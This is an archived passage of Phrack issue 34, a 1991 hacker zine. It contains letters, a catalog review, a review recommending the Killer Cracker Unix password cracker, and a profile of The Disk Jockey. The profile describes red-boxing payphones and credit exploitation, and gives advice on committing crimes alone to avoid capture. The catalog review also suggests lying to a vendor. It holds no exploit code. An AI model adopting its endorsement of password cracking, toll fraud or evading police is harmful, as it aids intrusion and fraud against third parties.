home *** CD-ROM | disk | FTP | other *** search
/ Group 42-Sells Out! - The Information Archive / Group 42 Sells Out (Group 42) (1996).iso / zines / phrack / phrack34.txt < prev    next >
Text File  |  1995-11-30  |  155KB  |  3,211 lines

  1.                                 ==Phrack Inc.==
  2.  
  3.                 Volume Three, Issue Thirty-four, File #1 of 11
  4.  
  5.                               Issue XXXIV  Index
  6.                               __________________
  7.  
  8.                                P H R A C K  3 4
  9.  
  10.                                October 13, 1991
  11.                               __________________
  12.  
  13.                            ~Technology for Survival~
  14.  
  15.  
  16.      Welcome back to Phrack Inc.  From now on, the editorship will consist of
  17. Crimson Death and Dispater.  We have decided to join both our forces and pool
  18. our assets to make Phrack even better.  We will have accounts at various
  19. Internet sites, however, all file submitions should be mailed to
  20. phracksub@stormking.com.  If you do not have access to the Internet give Free
  21. Speech BBS a call.  Crimson Death will take it from there.
  22.  
  23.      Special thanks this month goes out to Night Ranger for being great help!
  24. Also thanks to Inhuman and Laughing Gas for taking the time to submit
  25. material.
  26.  
  27.      Phrack has never really had a distrabution BBS, but you can always get it
  28. on the Internet at EFF.ORG or CS.WIDENER.COM.  Off the Internet, the BBS
  29. distribution will be from Free Speech BBS.  Below are a list of a few other
  30. boards that carry all the Phracks.
  31.  
  32.                      Free Speech BBS     (618) 549-4955
  33.                      Blitzkreig BBS      (502) 499-8933
  34.                      Digital Underground (812) 941-9427
  35.                      Pyrotechnic's Pit   (407) 254-3655
  36.  
  37.      We would also like to thank the nameless numbers of BBS's out there that
  38. carry Phrack Inc. without their names being listed here!
  39.  
  40.      In this issue of Phrack Inc. we are starting a "letters to the editor"
  41. section called "Phrack Loopback."  Any questions, comments, corrections, or
  42. problems that you the reader would like to air with Phrack publically will be
  43. answered there.  Loopback will also contain information such as reviews of
  44. other magazines, catalogs, hardware, and softare.  With Loopback we hope to
  45. make Phrack Inc. more interactive with our readers.
  46.  
  47.      This month we had an oportunity to interview one of our "hacker hero's",
  48. The Disk Jockey.  We are also trying to "liven up" Phrack World News a little
  49. by adding some editor's comments about recent news topics.  If we get a
  50. positive response, we will continue doing this.  Hopefully you will respond
  51. with your views as well.
  52.  
  53. Your Editors,
  54.  
  55.                Crimson Death                          Dispater
  56.             cdeath@stormking.com               phracksub@stormking.com
  57. ===============================================================================
  58. COMMENTS INSERTED BY SERVER:
  59.  
  60.         As the server of the Phrack Mailing List, I'd like to get a few
  61. words in.  First, since I am currently a VERY DUMB list server, I am currently
  62. not very interactive.  I am working with the system administrators and owners
  63. to get an interactive "LISTSERV" onto this machine.  I would also like to know
  64. if anyone can get me access to an IP address via SLIP at an Internet site
  65. VERY CLOSE to the Newburgh/Poughkeepsie, NY area.  Another thing I could use
  66. is a Phrack SubBot for IRC.  Something small that would allow you to get
  67. information on the release date of the next Phrack, add your name to the
  68. Mailing List, find out the Index of the last issue and such.  I can handle
  69. awk, perl and 'C'.  An IRC connection (Not the server software) would also
  70. be interesting.  Another thing I heard of and am interested in is something
  71. that might start a seperate list.  There is a game, where you write a program
  72. to make a robot to fight another programmed robot.  You run these against
  73. each other to see who will win.  You can then modify the code to try again.
  74. It needs to be compatible with an IBM Risc/6000 running AIX 3.1.5 running
  75. patch #2006.  Help is also needed with SENDMAIL.CF configuration and etc.
  76. Basically, if you have something that the SERVER might be interested in,
  77. please mail "server@stormking.com". Also, if someone mentions that they are
  78. not receiving a copy when they asked to subscribe, anything that DOES bounce
  79. back here is automatically deleted.  For example, if something comes back
  80. from SUSY.THUNDER@POKER.LASVEGAS.NV.CA (Susan Lynn Headley) and I am told
  81. that POKER.LASVEGAS.NV.CA is not connected to CYBERPUNK.HAFNER.MARKOFF.NY.NY
  82. I will NOT attempt to resolve the message.
  83.  
  84.                                         Storm King List Server
  85. ===============================================================================
  86. _______________________________________________________________________________
  87.  
  88.                         Phrack XXXIV  Table of Contents
  89.                         =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  90.  
  91.  1. Introduction to Phrack 34 by Crimson Death & Dispater
  92.  2. Phrack Loopback by The Phrack Staff
  93.  3. Phrack Prophile of The Disk Jockey by The Disk Jockey & Dispater
  94.  4. The AT&T Mail Gateway by Robert Alien
  95.  5. The Complete Guide to Hacking WWIV by Inhuman
  96.  6. Hacking Voice Mail Systems by Night Ranger
  97.  7. An Introduction to MILNET by Brigadier General Swipe
  98.  8. TCP/IP: A Tutorial Part 2 of 2 by The Not
  99.  9. Advanced Modem-Oriented BBS Security by Laughing Gas & Dead Cow
  100. 10. PWN/Part01 by Dispater
  101. 11. PWN/Part02 by Dispater
  102. _______________________________________________________________________________
  103.  
  104.                                 ==Phrack Inc.==
  105.  
  106.                 Volume Three, Issue Thirty-four, File #2 of 11
  107.  
  108.                          ^[-=:< Phrack Loopback >:=-]^
  109.  
  110.                              By:  The Phrack Staff
  111.  
  112.      Phrack Loopback is a forum for you, the reader, to ask questions, air
  113. problems, and talk about what ever topic you would like to discuss.  This is
  114. also the place The Phrack Staff will make suggestions to you by reviewing
  115. various items of note; magazines, software, catalogs, hardware, etc.
  116. _______________________________________________________________________________
  117.  
  118. What's on Your Mind
  119. ~~~~~~~~~~~~~~~~~~
  120.  
  121. >Date: Fri, 20 Sep 91 01:22:30 -0400
  122. >To: phracksub@stormking.com
  123. >
  124. >So what exactly DID happen to Agent Steal?  There was a small blurb in
  125. >PWN for 33, but gave no details.  Why was he arrested, what was confiscated,
  126. >and how long will he probably be away for.
  127. >
  128. >Mind you, this is a tragic loss, since Agent Steal was a gifted hacker and
  129. >had a whole lotta balls to boot.
  130. >
  131. >                               Sincerely,
  132. >
  133. >                                   A concerned reader
  134.  
  135.      To be honest, it would not in his best interest to say much about his
  136. case before his trial.  What we have written comes from a very reliable source.
  137. Some people close to him are denying everything.  This is most likely to keep
  138. from happening to him what happened to people like Mind Rape, who have basically
  139. been "convicted" by the media.
  140.  
  141. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  142.  
  143. >From: Drahgon
  144. >Date: Thu Sep 26 06:00:35 1991
  145. >
  146. >    Dear Dispater,
  147. >
  148. >        My name is Drahgon unless, of course.  I have several things to blow
  149. >    from my mind here....
  150. >
  151. >        How is the progress of Phrack  33?  I am not really up on all the
  152. >    hoopla surrounding  it, but  I am  curious.  In  high school  I  often
  153. >    published "underground newsletters" about the manufacture of drugs and
  154. >    explosives, etc.   The computer underground is a  new territory for me
  155. >    and I have just begun.  I would love to hear about your mag....I would
  156. >    perhaps have something to offer.
  157.  
  158.      We at Phrack Inc. are here to publish any kind of information you the
  159. reader are interested in.  We, unlike many other people out there, will not
  160. judge you and can call you a "lamer" if you submit something to us that we
  161. might think is a little elementary.  We might not necessarily run it in Phrack,
  162. but we aren't the kind of people that are going to call you up in the middle
  163. of the night on an Alliance Teleconference and harass you.  In fact, there are
  164. many text files out there that are out-dated and need to be corrected!
  165. Simply put, if you are interested in it, there are probably two hundred others
  166. out that are afraid to ask, because some El1Te person will call them
  167. "stupid."  Here at Phrack Inc., WE ARE NOT El1Te, WE ARE JUST COOL AS HELL!
  168. We want to help everyone in their quest for knowledge.
  169.  
  170. >        Secondly,  I want to start  my own bbs up  here in my town.  This
  171. >    town  is dead,  but there  is still a  glint of  life, it  needs to be
  172. >    kindled.  There are currently  no BBS's up here that carry information
  173. >    of  an "alternative nature",  and there  is in fact  laws that prevent
  174. >    them from springing up.  (whatever happened to freedom of the press?),
  175. >    Well,  anyway, I  would like to  know if you  would support  a BBS of
  176. >    mine, and maybe you could give me some pointers...
  177. >
  178. >    Thanx ALOT
  179. >         DRAHGON
  180.  
  181.      That's great!  We're always glad to see new faces that are truly interested
  182. in helping people by becoming a source of information.  If you
  183. have any questions about BBS's you should ask the expert, Crimson Death.  He
  184. will be more than happy to help you out.
  185. _______________________________________________________________________________
  186.  
  187. Corrections
  188. ~~~~~~~~~~
  189.      In V.3, I#33, File 9 of 13, there was a error.  R5 Should have been a
  190. 10K pot and not just a resistor.  The corrected part of the schematic
  191. should look like this:
  192.        _
  193. +9__S1/  _____________________________________________________________
  194.         |        |           |          |                   |   S3    |
  195.        R1       R2           |         R3                o  @  o      |
  196.         |___C1___|      _____|          |_________|/___ /   o   \___  |
  197.         |    ____|_____|_____|____      |     |   |\   |    |      _| |
  198.      _| o   |    6     4    14    |    R4     |__ D1   |    |   R9<   |
  199.  S2   | o  _|5                  13|_____|       _|     |    |__  |    |
  200.         | | |                     |     |__  R5<       |      _| |    |
  201.         g |_|10       IC1        8|_      _|  |        |   R8<   |    |
  202.             |         556         | |__R6<    g        |__  |    |    |
  203.            _|9                  12|_|                    _| |    |    |
  204.           | |                     | |__C2__g          R7<   |    |    |
  205.           | |_11___3___7___2___1__|                    |    |    |    |
  206. _______________________________________________________________________________
  207.  
  208. Hardware Catalog Review
  209. ~~~~~~~~~~~~~~~~~~~~~~
  210. by Twisted Pair
  211.  
  212. You can never get enough catalogs.  One reason is because you never know what
  213. off-the-wall parts you'll be needing.  From time to time I'll be reviewing
  214. catalogs so you'll be able to learn where to get the really good stuff as far
  215. as computer equipment, telco test equipment, and IC chips are concerned.  In
  216. this issue, we study two of them...
  217.  
  218. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  219.  
  220. SYNTRONICS
  221. 2143 Guaranty Drive
  222. Nashville, Tennessee  37214
  223. (615) 885-5200
  224.  
  225. I recently saw an issue of "Nuts and Volts" magazine which had a Syntronics ad
  226. in it.  I sent the dollar they wanted for a catalog.  Apparently, demand for
  227. the catalogs was so  great that they're having some more printed up.  They sent
  228. my dollar back with an explanation and a partial photocopy of the catalog.
  229. An associate on the left coast and I want to build a tone decoder and have been
  230. looking for a particular chip for a long time.  We found it in this catalog.
  231. It's an SSI-202 Tone Decoder IC for $12.  Not bad for a chip I was unable to
  232. locate in about 30 catalogs I've searched through.  A fellow phreak was told by
  233. a zit-faced Radio Shack employee over their 800 number, "They had only 3 left
  234. and they would cost $100 each." I don't think so.
  235.  
  236. Syntronics is selling plans for an interesting device you hook up to the phone
  237. line.  With it you can call it and  turn on any one of three 110VAC outlets.
  238. To turn them  on you use simple DTMF commands.  This would be useful for
  239. turning on your computer, modem, room bug, security lights, etc from a remote
  240. location.  Plans for this device  cost $9 and you'd need the above-mentioned IC
  241. chip to build it with.
  242.  
  243. Syntronics carries:
  244. -------------------
  245.  Project Plans    Software    Unusual Hardware    Kits    IC's    Transistors
  246.  
  247. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  248.  
  249. Telephone International         (The marketplace for
  250. PO BOX 3589                     communications equipment,
  251. Crossville, Tennessee  38557    services, and employment)
  252. (615) 484-3685
  253.  
  254. This is a monthly publication you can receive free. It's usually about 30 pages
  255. printed on large yellow-pages paper.  To save yourself the $50 a year
  256. first-class yearly subscription rate, just tell them you're a telephone
  257. technician.  Tell them you need to often buy PBX's, Terminal Blocks, etc.
  258. They'll send it to you free, because you're special!
  259.  
  260. Here's a sampling of stuff you can find in there:
  261. -------------------------------------------------
  262. A Complete Digital Switching System with 3200 lines on a flatbed trailer !!!!!!
  263. Repaired Payphones                                Optical Fiber xmission system
  264. Operator's Headsets                                     CO Digital multiplexers
  265. AT&T teletypes                                                Used FAX machines
  266. AT&T Chevy bucket trucks                                           Hookswitches
  267.  
  268. Digital error message announcers     Central Office Coin System Processor Cards
  269.  
  270. Telephone International lists a bunch of telco seminars happening around the
  271. country on their "Calendar of Events" page.  They also list conferences for
  272. security organizations including dates and phone numbers you'd need to register.
  273.  
  274. That's it for this edition of Hardware Hacking.  Keep an eye out for good
  275. suppliers to the Phreak world.  Pass'em along to Phrack.
  276.  
  277.                                -T_W-I_S-T_E-D_
  278.                                   -P_A-I_R-
  279. _______________________________________________________________________________
  280.  
  281. A Review of the Killer Cracker V.7.0
  282. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  283. by The Legion of d0oDez
  284.  
  285. As every hacker worth his/her salt knows, the Unix operating system has major
  286. security problems when it comes to it's passwd file.  Although this may be
  287. good as some people think information should not be hoarded, others think
  288. information should be kept to be people who can use it best, the one's with
  289. the most money.  The passwd file is the Unix file that stores the user
  290. information which included username, home directory, and passwords among
  291. others.  I will not go into the basics of Unix as this is not a Unix
  292. how-to hack file.  It is a review of Killer Cracker 7.0 (aka KC7.)
  293.  
  294. KC7 is a Unix password hacker that is portable to most machines.  It is
  295. written by Doctor Dissector and is free software as the terms of the GNU
  296. General Public License (By the Free Software Foundation <address at end of
  297. file>) states.  The version 7.0 is not the latest version but seems to be
  298. the best to use.  It is dated as 6/1/91 which makes it pretty recent.  8.0
  299. is rumored to be out but we have not had the opportunity to review it yet as
  300. we are still testing it. ;-)
  301.  
  302. The best thing about KC7 is that you can run it on most machines that will
  303. run C programs which happens to include MS-DOS machines.  With this in
  304. mind, you can now let your PC do the work of hacking passwords in the privacy
  305. of your own home without having to use a mainframe which might be a bit
  306. risky.  The distribution copy of KC7 comes with the following files:
  307.  
  308.       KC.EXE -- MS-DOS executable
  309.       KC.DOC -- Documents
  310.   Source.DOC -- The source code to KC
  311.         KC.C -- The Turbo C source code
  312.  
  313.   And other files that pertain to DES and word files.
  314.  
  315. KC7 works by taking an ascii file composed of words and encrypting them so
  316. that it can compare the encrypted words with the passwords in the PASSWD file.
  317. It is pretty efficient but if running on an MS-DOS system, you will probably
  318. want to use a machine that is at least a 286-12 or higher.  The time to
  319. complete a PASSWD file is directly proportional to how large the file is
  320. (max size of PASSWD must be less than 64K on an MS-DOS machine) and what
  321. speed of machine you are using.  There are options which allow you to take
  322. words (aka guesses) from other sources as well as a words file.  These
  323. sources can be words from the PASSWD file such as the username, single
  324. characters, and straight ascii characters such as DEL or ^D.  It can also
  325. manipulate the guesses in various ways which might be helpful in guessing
  326. passwords.
  327.  
  328. Another useful option is the RESTORE function.  KC7 has the ability to
  329. allow the user to abort a crack session and then resume cracking at a
  330. later date.  This is very nice since one does not always have the time
  331. nor patience to crack a 50k passwd file without wanting to use his/her
  332. machine for other uses such as trying out new passwords.
  333.  
  334. We have found that the best way, as suggested by the author, to crack is by
  335. using the default method which is to crack by word and not by username.
  336. You will understand when you get a hold of the software.
  337.  
  338. You can get KC7 at most H/P oriented bbs's as everyone thinks he/she is
  339. a Unix wizard nowadays.
  340.  
  341. Overall, KC7 is an excellent program and we suggest it to all Unix hackers.
  342. We also hope you have enjoyed this file and we look forward to bringing
  343. more interesting reading to your terminal.  Until then.... Happy hacking.
  344. _____________________________________________________________________________
  345.  
  346.                                 ==Phrack Inc.==
  347.  
  348.                 Volume Three, Issue Thirty-Four, File #3 of 11
  349.  
  350.                 -*[  P H R A C K  XXXIV  P R O P H I L E  ]*-
  351.  
  352.                         -=>[ Presented by Dispater ]<=-
  353.  
  354.                                 The Disk Jockey
  355.                                 ~~~~~~~~~~~~~~~
  356.               Handle: The Disk Jockey (over 10 years now...)
  357.             Call him: Doug
  358.            Reach him: douglas@netcom.com
  359.         Past handles: None
  360.        Handle origin: Selected it way back in the Apple days, when
  361.                       it was hip to have a hardware-related name.
  362.        Date of Birth: 12/29/67
  363.  Age at current date: 23
  364. Approximate Location: Silicon Valley
  365.               Height: 6'1"
  366.               Weight: 220 lbs.
  367.            Eye color: Green
  368.           Hair Color: Blond/brown
  369.            Education: Cornell, Univ of Michigan, Stanford, and a
  370.                       slew of others schools that I had the
  371.                       opportunity to attend.  What started out as
  372.                       a strong belief in law became so jaded that
  373.                       I fell back on Comp Sci.  Still wake up in
  374.                       the middle of the night yelling "NO!, NO!"
  375.                       Also have a wallpaper degree in Psychology.
  376.            Computers: First: Apple //.  Presently: several.  Mac
  377.                       IIfx, 386/33, and several others that I can't
  378.                       seem to get rid of...
  379.  
  380. -------------------------------------------------------------------------------
  381.  
  382. The Story of my Hacking Career
  383. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  384.  
  385.      I was lucky enough to be able to get my hands on computers early, back in
  386. the days of the PET and the TRS-80.  Although we poke fun at a Trash-80 now, at
  387. the time I was completely fascinated by it.  Remember Newdos/80, LDOS, and
  388. utilities like SuperZap?
  389.  
  390.      Things started really rolling after a friend introduced me to the Apple.
  391. Although I never fell into the stereotype of being a computer "nerd" (don't we
  392. all like to think that?), compared to the redundancy of normal schoolwork,
  393. learning about the Apple was a new and unexplored world.  Unlike most of the
  394. other computer "types", I didn't read science fiction, didn't have any social
  395. problems, and thought looking at girls was more enjoyable than talking about
  396. hardware.  Well, depending on the hardware. (ha-ha!)
  397.  
  398.      "Cracking" Apple software was of course the next logical step.  The 6502
  399. was a wonderful chip, and easy to learn.  Copy-cards and other "hacked"
  400. hardware was becoming findable and it was getting to the point that the
  401. only goal was to get your hands on pre-release software.  Before I had entered
  402. the "modem" world, friends had a network of other people across the country and
  403. traded things by mail.
  404.  
  405.      Of course the whole world changed when I picked up a 300 baud modem.
  406. Suddenly there was the communication and knowledge that I had been hungry for.
  407. People wrote text files on just about everything imaginable.  What is the
  408. president's phone number?  How can I call the pope?  How can I make lowercase
  409. on my Apple II?  What are the routing numbers for boxing to the Eastern Bloc
  410. countries?
  411.  
  412.      Codes were never much of an interest.  The systems that ran them, however,
  413. were quite interesting.  As technology advanced, SCCs started  using
  414. sophisticated AI techniques to detect any kind of abnormal usage instantly.
  415. Codes used to last several months, now they only lasted a few hours.  Boxing,
  416. however, was a little more elegant and was the flashy way to call your friends.
  417.  
  418.      Even before I had ever heard of boxing or phreaking, I enjoyed the
  419. benefits of what we now know as a "red box".  While in boarding school, I
  420. noticed that a somewhat broken phone emitted obscenely loud "beeps" when you
  421. dropped in a quarter.  I took a little micro-recorder and recorded myself
  422. dropping about $5.00 into the phone.  When I played this back into the
  423. telephone, the telco thought I was actually dropping change in the machine!  I
  424. was able to call my girlfriend or whomever and speak for hours.  Now most
  425. payphones mute those tones so they are barely audible, if at all.
  426.  
  427.      Local user groups were a good place to pick up software, legal and
  428. otherwise.  Remember those damn "CLOAD" magazine tapes for the TRS-80? 80-Micro
  429. magazine?  The early 80's was the time of the hardware hacker - anything
  430. bizarre you wanted you had to make yourself, since it wasn't available
  431. otherwise.  Now you can call any of a slew of 800 numbers, give them your
  432. credit card number (!) and have it on your doorstep the next day.
  433.  
  434.      I think part of the problem of the "new generation" of hackers, phreakers,
  435. warez kids, etc, is that they never had the experience with low-level stuff and
  436. actually having to into the hardware to get what they wanted.  Their only
  437. programming experience is coming from school, which gives a shallow and usually
  438. totally impractical background for the "real world".
  439.  
  440.      My eventual disgust with the pirate world came when products such as
  441. "Pirate's Friend" came out, allowing people to sector edit out my name and
  442. insert theirs.  I had spent quite a lot of time trying to find new software,
  443. and enjoyed the ego stroke of having my name passed around. I had a lot of
  444. respect for book authors that were plagiarized after that...
  445.  
  446. About the industry
  447. ~~~~~~~~~~~~~~~~~
  448.  
  449.      The computer industry in general is interesting.  Working in it, I hope
  450. I'm justified to speak about it.  Getting  a job is quite easy, since the
  451. technology is changing so much, unless it is in something that will be around
  452. for some time, you can usually pick up a job by just knowing the latest
  453. developments, the buzzwords, and having good "chemistry".  In the valley many
  454. firms realize that colleges don't really teach you much in the way of practical
  455. knowledge.  At best, they give you the opportunity to try different types of
  456. machines.  It amazes me that HR departments in companies across the country
  457. won't even look at a resume unless the applicant has a college degree.
  458. Advanced degrees are a different matter and are usually quite applicable
  459. towards research, but your usual BA/BS variety?  Nah.  If you want to make a
  460. lot of money in this industry, all you need to do is get the reputation as a
  461. person who "gets things done" and have superior communication skills.  You can
  462. write your ticket after that.
  463.  
  464. About legal issues
  465. ~~~~~~~~~~~~~~~~~
  466.  
  467.      Anyone who has ever read some of my later text files (1986, 1987) knows
  468. that I had no qualms about the legalities of beating an establishment.
  469. Although my line of morals was probably beyond where others placed theirs, I
  470. could always justify to myself damage or loss to an establishment, "beating the
  471. system", rather than hurting the individual.  Although I am pretty right-winged
  472. in beliefs, I have a great distrust for the policing agencies.
  473.  
  474. Various memories
  475. ~~~~~~~~~~~~~~~
  476.  
  477.      Getting a call from my father while at school and being told that Control
  478. C had called him and relayed the message "Tell Doug the FBI are after The Disk
  479. Jockey.  Get rid of everything and hide."  To say I "cleaned house" would have
  480. been a gross understatement.  I knew this was true, I, like many others, had
  481. just ridden on the false pretense that they would have better things to do then
  482. come after me.  I later saw intelligence reports showing that I had been kept
  483. track of for some time.  I was described as:
  484.  
  485. "Involved in some type of student-loan scam through creating fictitious college
  486. applicants at his school.  Very violent temper, ruthless attitude.  Breaks
  487. people's legs for money (TX).  Owns a motorcycle and a european sedan.  Nasty
  488. hacker."
  489.  
  490.      Only a handful of people would know that I had a motorcycle, so it was
  491. somewhat upsetting that they had this kind of information on me.  I later saw
  492. some of this same information in Michigan Bell Security's records.  They also
  493. had the correct phone number for my place at Cornell, my parents number, and
  494. even the number of some of my personal non-computer related friends.
  495.  
  496.      SummerCon in 1987 was a fun experience.  I had the opportunity to meet
  497. many of the people that I communicated with regularly, as well as wonder why
  498. people thought St. Louis was such a wonderful place.  While there were a few
  499. socially "on-the-fringe" types, I was amazed that most of the other "hackers"
  500. didn't fit the usual stereotypes.  They were just regular guys that had a some
  501. above average cleverness that allowed them to see the things that others
  502. couldn't.
  503.  
  504.      By the time I was 20 years old, I had about $40,000 worth of credit on
  505. plastic, as well as a $10,000 line of credit for "signature loans" at a local
  506. bank.  The credit system was something that seemed fun to exploit, and it
  507. doesn't take long to figure out how the "system" works.  With that kind of cash
  508. Aavailable, however, it's tempting to go and buy something outrageous and do
  509. things that you wouldn't normally do if you had the cash.  This country is
  510. really starting to revolve around credit, and it will be very hard to survive
  511. if you don't have some form of it.  If more people were aware of how the credit
  512. systems worked, they might be able to present themselves in a better light to
  513. future creditors.  I don't think that credit is a difficult thing to
  514. understand, I just had an unusual interest in understanding and defeating it.
  515. Perhaps this is something that my future text files should be about.
  516.  
  517. Getting busted
  518. ~~~~~~~~~~~~~
  519.  
  520.      On June 27, 1988 at 1:47am, I had just parked my car outside my apartment
  521. and was walking up to the door when I heard someone say "Doug?"  I knew that no
  522. friend of mine would be visiting at that hour, so I knew my fate before I
  523. turned around.  An FBI agent, State police detective and a local detective were
  524. walking up to me.  "We have a warrant for your arrest." Interestingly, they had
  525. actually several warrants, since they weren't sure what my name was.  I was
  526. being arrested for 6 counts of "conspiracy to commit fraud".  After being
  527. searched to make sure I wasn't carrying a gun, they asked if they could "go
  528. into my apartment and talk about things".  Although I had completely "cleaned
  529. house" and had nothing to hide in there, I wasn't about to help out an
  530. investigation on me.  "Ah, I think I had better contact an attorney first."
  531. "Is there one you can call right now?"  "Are you kidding?  It's 2:00am!"
  532.  
  533.      I was handcuffed and had my legs strapped together with a belt and was
  534. thrown in the back of a car.  This was one of those usual government cars that
  535. you see in the movies with the blackwalls and usual hubcaps.  Interestingly
  536. enough, the armrest of the car hid quite an array of radio equipment.  Although
  537. pretty freaked out, I figured the best thing to do at that point was try to get
  538. some sleep and call the best attorney money could by in the morning.
  539.  
  540.      Little did I know where I was being brought.  I was driven all the way to
  541. a small Indiana town (population 5,000) where a 16 year-old Wheatfield Indiana
  542. boy had made the statement that he and I "agreed to devise a scam".  Although
  543. nothing was ever done, merely planning it created the conspiracy charge.
  544.  
  545.      I figured that after my arraignment I could post bail and find an
  546. attorney.  I had almost $10k in the bank and could probably find more if I
  547. needed it.  I was sadly mistaken.  The next day at my arraignment the charges
  548. were read and bail was set -- $150,000.00, cash only!
  549.  
  550.      In a strange turn of events, the FBI decided to totally drop the case
  551. against me.  The federal prosecutor figured it wasn't worth wasting his time
  552. and they jumped out.  However, the Indiana state police were involved in my
  553. arrest and were angry that the FBI was dropping the case after they had
  554. invested so much time and money in the case, so they decided to pursue the case
  555. themselves.  There is so much friction between the FBI and state police, that
  556. the FBI didn't even answer their letters when they tried to request information
  557. and data files on me.
  558.  
  559.      Funny.  I spent 6 months in a tiny county jail, missing the start and
  560. first semester of school.  I was interrogated constantly.  I never told on a
  561. sole and never made a statement about myself.  I sat in jail daily, reading
  562. books and waiting for my court dates.  Although I never expected it, nobody
  563. ever thanks you when you keep your mouth shut.  I can't imagine that many
  564. people would sit in jail for a long time in order to save their friends.
  565. Perhaps it's a personal thing, but I always thought that although I doubt
  566. someone else would do it for me, I would never, ever tell anything on anyone
  567. else.  I would never be responsible for someone else's demise.  It took a lot
  568. of money, and a lot of friday nights of frustration, but I walked away from
  569. that incident without ever making a statement.  It was at a time when my
  570. "roots" were deepest and I probably could have really turned in a lot of other
  571. people for my benefit, but it was at a time in my life where I could afford to
  572. miss some school and the integrity was more important to me.  There were a lot
  573. of decisions that had to be made, and spending time in jail is nothing to be
  574. proud of, but I never backed down or gave in.  It did provide the time for me
  575. to really re-evaluate who and what I was, and where I was going.
  576.  
  577. People I've known
  578. ~~~~~~~~~~~~~~~~
  579.  
  580. Compaq            Personal friend for some time now.
  581. Control C         Mostly likely the craziest guy I've ever met.
  582.                   Really nice guy.
  583. Knight Lightning  Would call me up in the middle of the night and
  584.                   want to discuss philosophical and social issues.
  585.                   Kind of guy I would probably get along with outside
  586.                   of computers as well.
  587. Loki              Friend since high school.  Made a big splash in the
  588.                   h/p world, then disappeared from it.  He and I (and
  589.                   Control C) drove to SummerCon together.
  590. Shooting Shark    Great guy who used to be into calling bridges
  591.                   and would yell "Hey, I'm paying for this!"  Truly
  592.                   one of the only people that I ever knew that didn't
  593.                   do anything blatantly illegal.  Most of our email
  594.                   was over the optimization of crypt.  The Mad Alchemist
  595.                   Sysop of Lunatic Labs, one of the only boards that
  596.                   I feel is worth the telephone call anymore.
  597.                   He has given me a lot of slack and runs
  598.                   a BBS that picks up some of the most obscure
  599.                   information.  A sysop that others should be judged
  600.                   by.
  601. Tom Brokaw        Personal friend since childhood that stood by me
  602.                   through thick and thin, bailing me out of trouble
  603.                   time and time again.  I can never thank him enough
  604.                   for being a true friend.
  605.  
  606. BBSs
  607. ~~~
  608. More than I could mention here.  A few more recent notables --
  609.  
  610. Atlantis          Although run on an Apple, the Lineman had this
  611.                   system so slick and customized that it became the
  612.                   standard that a lot of the PC based boards were
  613.                   created with.  It was the first real
  614.                   "clearinghouse" for text files.
  615. Free World II     Run by Major Havoc and myself, this was an
  616.                   incredibly robust system, and was one of the first
  617.                   to be run on a US Robotics HST. Although it was
  618.                   primarily a discussion board, the file areas
  619.                   offered some of the best files -- virtually no
  620.                   games, but about every real utility and the like.
  621.  
  622. Metal AE          201-879-6668 - this was a true blue AE line that
  623.                   was around for like 5 or 6 years and was ALWAYS busy.
  624.                   Had all of the original cDc and other bizarre text
  625.                   files, occasionally some new Apple warez.
  626.  
  627. Lunatic Labs      Still up and still great.
  628.  
  629. Metal Shop Private    Perhaps one of the best boards of all time.
  630.                       Run by Taran King and had a healthy, yet
  631.                       secure userlog.  It was a closed system, the
  632.                       only way to get on was to know somebody.
  633.                       Everyone on the system knew each other in
  634.                       some sense.
  635.  
  636. World of Cryton   One of the first boards to have a "philter" and to
  637.                   really push the messages as far as codes, accounts,
  638.                   card numbers, etc.  This was also the demise, along
  639.                   with many of the 414 hackers.
  640.  
  641. Misc
  642. ~~~
  643.  
  644. 2600 Magazine     How could I not like a magazine that published
  645.                   articles I wrote?  This really is a great magazine
  646.                   and anyone who is interested in computers, privacy,
  647.                   or cyber-issues in general should subscribe.
  648.  
  649. Fame...?          Was in the movie "Hoosiers"  (thanks for bringing
  650.                   that up, Shark!), even though I'm not a basketball
  651.                   fan.  Met Dennis Hopper, etc. Went to school with
  652.                   a lot of famous people's kids.  Most have some
  653.                   pretty serious problems.  Be glad you are who you
  654.                   are.
  655.  
  656. Marriage...?      I'm single and will do everything I can to stay
  657.                   that way.  When people ask me about getting married
  658.                   I tell them that the idea of car payments scare me.
  659.                   I enjoy having girlfriends, but I've become too
  660.                   independent.  I still run around at bars until
  661.                   sometimes 3:00am or so, but still manage to spend
  662.                   about 50 or 60 hours a week at work.  Even if I cut
  663.                   out the bar scene, I wouldn't have much time to
  664.                   spend with someone else on a daily basis.
  665.  
  666. Advice            If you ever get into doing illegal things, make
  667.                   sure you do them by yourself.  Your chances of
  668.                   getting caught when you do things solo and resist
  669.                   the temptation to "brag" about them is minimal.
  670.                   When someone else knows about what you have done,
  671.                   it doesn't matter how good of a friend they are.
  672.                   If they get into trouble, you are going to the
  673.                   sacrificial lamb when it comes to negotiating their
  674.                   freedom.  Even the strongest willed individuals
  675.                   seem to crumble when questioned by police.
  676.                   Groups are bad news.  There are very little
  677.                   advantages to being in a group and all it does is
  678.                   increase your personal risk by multitudes.
  679.                   Cracking groups aren't nearly as dangerous, but
  680.                   they DO bring boards down.  Look to the fate of
  681.                   groups such as LOD for examples of group fate.  Lex
  682.                   Luthor, perhaps one of the most elusive and private
  683.                   hackers of all time was the one to bring down the
  684.                   rest of the group.  This was tough for me, as many
  685.                   of the members were people I talked with and could
  686.                   really feel for.
  687.  
  688.                   Don't get discouraged in life if you feel that you
  689.                   are behind the rest because you don't come from a
  690.                   rich family or have the best equipment.  I left
  691.                   home when I was 17 years old, keeping only minimal
  692.                   contact with my parents since then and lived life
  693.                   pretty well, using my abilities to "smooth talk"
  694.                   and pure enthusiasm to walk into about any job.
  695.                   Don't put people down -- everyone has something to
  696.                   teach you, even the bum on the street might be able
  697.                   to tell you how to make some free phone calls!
  698.                   There is a wealth of information to be found via
  699.                   Usenet, text files, or even your school or public
  700.                   library.  Stay informed and well read.
  701.  
  702. Email             I always enjoy hearing from people.  Reach me via
  703.                   the Internet at douglas@netcom.com, or on Lunatic
  704.                   Labs BBS.
  705.  
  706. ________________________________________________________________________________
  707.  
  708.  
  709.                                 ==Phrack Inc.==
  710.                 Volume Three, Issue Thirty-four, File #4 of 11
  711.                             _______________________
  712.                           ||                       ||
  713.                           || The AT&T Mail Gateway ||
  714.                           ||                       ||
